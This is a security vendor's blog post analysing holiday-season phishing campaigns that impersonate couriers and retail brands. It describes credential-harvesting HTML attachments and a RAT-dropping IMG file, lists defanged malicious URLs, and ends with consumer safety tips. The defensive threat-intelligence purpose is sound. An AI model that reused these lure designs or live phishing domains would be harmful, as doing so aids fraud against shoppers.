Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

‘Tis the Season for Online Shopping and Phishing Scams

The 2022 holiday shopping season is here. Retailers’ discounts are kicking off early, and shoppers are eager to spend, especially with big price markdowns to come as the season progresses. And with the COVID-19 pandemic still a concern to shoppers, more people are expected to shop online this season.

What this also means is that as consumers whip themselves into a shopping frenzy, cybercriminals have activated their seasonal scams to try and steal money or personal information. These scams are well thought out and include realistic email messaging that uses well-known name brands like UPS, FedEx, and Ray-Ban to help convince unwary shoppers to click on links that lead to fake websites or open malicious attachments.

Already this year, consumers spent a record $9.12 billion shopping online during Black Friday, according to Adobe. Overall, online sales for Black Friday were up 2.3% year-over-year.

Across the entire holiday season last year, U.S. consumers spent a record $204 billion online, up 8.6% from 2020, as reported by Adobe Analytics.


Figure 1. US Holiday Spend Growth by year | Source: Adobe Analytics 

Holiday Shopping Season and Fraud

As online spending for the holidays is on the rise, it makes sense that this time of year is also when cybercriminals ramp up their attacks. As a result, fraudsters have already started to shift to their holiday-and-shopping-themed schemes to best target consumers’ financial assets and personal information.

During this shopping season, consumers make themselves vulnerable to attack as they browse the web for the best deals, purchase goods, and receive emails that include expected discount promotions, as well as order and shipping notifications. This digital presence makes scam campaigns more effective because cybercriminals’ fraudulent activity blends in with holiday and shopping activities. 

Phishing and Scams to Be Aware of this Season

This holiday shopping season, be on the lookout for phishing and scams specifically designed to blend in with holiday online shopping activities. Trustwave SpiderLabs has compiled a list of the most prevalent shopping-related scams expected this year. These samples were recently observed from Trustwave’s spam traps and other Trustwave monitoring systems. 

Package Delivery Scams 

These are phishing messages threat actors craft as package delivery notifications claiming to be from a legitimate package courier or shipping company like DHL, USPS, UPS, or FedEx. The message content usually contains a fake tracking link or an attachment that directs to a fake website asking users to input their password or other sensitive information. There is also a chance it may also download a piece of malware. 

These messages often come as fake notifications related to shipment issues, missing packages, or just a generic incoming package delivery notification. 


DHL Express - Address Confirmation Phishing Email

The below message impersonates the “DHL Express” brand, asking to verify address information contained in the attachment that leads to phishing.


The attachment is an HTML file named “AWB_87990589.html.” When clicked, it does not show any shipping information as mentioned in the email body. Instead, it shows a fake DHL Express login page that asks for the user’s account password. Phishers use HTML attachments to host the spoofed login site in the user’s device instead of the public internet as a way to bypass URL reputation checks.


Once the user has inputted the credentials and hit the ‘Sign in’ button, the form data will be sent to the endpoint hosting this action PHP link “hxxps[://]ww[.]barbacoasevilla[.]com/mail/DHL[.]php” This PHP call is the part where the phishers get to steal the credentials.


Fake U.S. Postal Service “Delivery Problem” Email Notification

This message below claims to be sent by USPS (United States Postal Service), mentioning a delivery problem. It contains a fake tracking link that leads users to a suspicious website where scammers can collect a user’s sensitive data.


Email URL: hxxp[://]gai-building[.]azurewebsites[.]net/bolderi[.]php?i=chanted&e=minimum

DHL “Failed Delivery” Notification Comes with Malware

Here is another phishing sample pretending to come from DHL. The attacker sends a fake shipment notification saying that the “delivery failed due to recipient refused package.”

Within the body of the email, it asks the target to open the attachment file (Delivery Report.img) to manage the failed delivery. It can be observed that the shipment information provided was too generic and others were mentioned as in the “attached file.”



The attachment is an IMG file that masks as a delivery report. This file contains an executable named “Delivery Report.exe” that pretends to be a Microsoft Word document, as observed in the figure below.


When executed, it will drop the Warzone Remote Access Trojan (RAT) as its payload, which is capable of credential theft and User Access Control (UAC) bypass. A RAT is a type of malware that gives an attacker unauthorized access to control an infected machine remotely. 

Fake Order Scams

Another popular tactic used by fraudsters is the Fake Order scam. These are messages that notify recipients regarding a product, service purchase status, or confirmation that originally was not placed by the recipient. This trick works exceptionally well against unsuspecting users since it is designed to make the user cancel the purchase, luring them to the phishing schemes.

The attacker also includes Instructions for cancellation or dispute in the message. The message could contain a link to a malicious/phishing page, a malware attachment, or a telephone number to call.

Fake Geek Squad Order scam

Geek Squad, Best Buy’s Tech Support service, is being impersonated in this phishing scam about a false subscription order. The message mentions that the membership has been auto-renewed and it also provides a telephone number to be called if the recipient wants to cancel or dispute. 

Once the victim calls the scammer, the scammer may ask for remote access to your machine or trick the person into divulging personal and payment information. These scammers may also use schemes to deceive users into paying with gift cards.


Bogus Card Payment Invoice Notification “Order Receipt”

This example is a bogus credit card billing notification informing the recipient of a transaction for a cryptocurrency-related purchase. We can observe that it contains no brand information, only generic credit card invoice details, and a fake customer support number to call to dispute the purchase.


Fake Product Scams 

This scam offers products or services at a high discount rate to lure consumers. Fraudsters send out promotional messages containing links leading users to a fake website impersonating the official brand. This bogus site may ask them to fill in the victim’s shipping details including the victim’s personal information and may require them to pay either by PayPal or via payment cards. Here, the fraudster’s main goal is to scam victims of their money by selling counterfeit goods or stealing sensitive information which can be used for additional frauds. 

Fake Ray-Ban Black Friday Sale – 90% Off 

This Black Friday-themed email claims to come from Ray-Ban, a well-known American-Italian luxury sunglasses and eyeglasses company, offering heavily discounted items (a too good to be true offer) with links leading to fake Ray-Ban website.


URL/Redirect Chain:

  • Email URL: hxxps[://]security-subscriber-center[.]grau-r[.]com/SubscribeClick?ox=rbm&6yvx6g=xxx@xxx[.]xxxx
  • Landing URL: hxxps[://]www[.]rbmhouse[.]com/m

The Legitimate Ray-Ban website vs Fake Site:

The fake Ray-Ban website domain in this campaign is rbmhouse[.]com was registered just 10 months ago while the legitimate Ray-Ban site is Ray-Ban[.]com which was registered 17 years ago.





The similarities and resemblance between the fake website vs. the original can effectively make unsuspecting users believe that the fake site is a legitimate Ray-Ban site. 



Fake Louis Vuitton Promotional Email – 88% Off

The email below is another irresistible discount offer that will catch a shopper’s eye. It claims to be from Louis Vuitton – a French luxury fashion house and company commonly known for its high-end leather goods. The email URL leads to a fake Louis Vuitton website.


URL/Redirect Chain:

  • Email URL: hxxp[://]www[.]88off-bags[.]com/
  • Landing URL: hxxps[://]www[.]lzvlv[.]com/

The landing page (hxxps[://]www[.]lzvlv[.]com/) is impersonating Louis Vuitton website that offers big product discounts. Other similar fake websites we found are:

  • www[.]lczlv[.]com
  • www[.]lwzlv[.]com 


Fraudulent Gift Card/Rewards and Survey Scams

Fraudsters also send messages impersonating banks or well-known brands offering bogus rewards such as gift cards. This scam may appear as a “Free Rewards/Gift Card Expiration” notification, with a call to action that states to avoid the reward’s expiration, users must provide their login credentials to what is a fake website. The email may also come as “you have been qualified for a reward” notification or a message promising rewards if the customer fills out a survey.

For survey-related campaigns, after completing the feedback on a bogus website, the threat actor may inform individuals that the gift card is no longer available, and users may be prompted to choose from various products for free or receive what will be a fake gift voucher. In addition, consumers will be asked to supply their credit card and personal information, which can be used to steal victim’s money or used for identity theft.


Fake 7-Eleven Survey Offers $100 Gift Card 

“Shopper, You can qualify to get a $100 7Eleven gift card!”

In this scam, an attacker entices a consumer with a specially crafted message offering a $100 gift card for completing a survey. This attempt will lead to users inputting their personal information to suspicious websites.


URL/Redirect Chain: 

  • Email URL: hxxp[://]papajohnsx[.]shop/fYGKFAhhMQT20m_SZRMWKap2Z9_8Pbn50tqN4O0vOLzuOTLe
  • Landing URL: hxxps[://]dailypublicmarket[.]com/v1/7el
    • Outgoing URL: hxxps[://]stadisticsdata[.]com/joragiwi/nu/cukabo/index.php
    • Outgoing URL: hxxps[://]bestgadgetsdailynow[.]com/afoffv2/checkout.php



After completing the short survey, the attacker directs the user to a new domain site containing  deals that can be unlocked with a purchase time limit. It offers one product for free, and the recipient will have to shoulder the shipping fee.


Once a user has chosen a product, the page will direct that person to another suspicious website followed by pushing them to a checkout page where the victim will be asked to input their shipping and payment information.

How to Protect Yourself this Holiday Season:

General security best practices: 

  • Beware of unsolicited emails, messages, and calls. For emails and other forms of messages, do not click links or open attachments from suspicious sources
  • Do not respond to spams and other unsolicited messages and calls
  • Follow best practices for password protection
  • Enforce multi-factor authentication (MFA)
  • Ensure that applications and systems – such as browsers, Anti-Virus, and OS systems are up to date

Tips for shopping and other holiday activities: 

  • Watch out for offers that look too good to be true
  • Research the product/retailer before buying. Check the official website and customer reviews
  • Use safer and traceable payment methods. Use a credit card over a debit card as it provides additional layers of protection
  • Regularly check accounts and credit card statements. Look for any suspicious or unauthorized charges
  • Monitor shipping process for shipment deliveries. Always obtain tracking information for any online purchases. Track using the legitimate website or application
  • When donating, always research the organization or website first
  • If you think you have been a victim of fraud, report it

Latest SpiderLabs Blogs

Cloudy with a Chance of Hackers: Protecting Critical Cloud Workloads

If you've been following along with David's posts, you'll have noticed a structure to the topics: Part I: The Plan, Part II: The Execution and now we move into Part III: Security Operations. Things...

Read More

Trustwave Rapid Response: CrowdStrike Falcon Outage Update

Trustwave is proactively assessing and monitoring our clients who may have been impacted by CrowdStrike’s recently rolled-out update for its Windows users. The critical issue identified with...

Read More

Using AWS Secrets Manager and Lambda Function to Store, Rotate and Secure Keys

When working with Amazon Web Services (AWS), we often find that various AWS services need to store and manage secrets. AWS Secrets Manager is the go-to solution for this. It's a centralized service...

Read More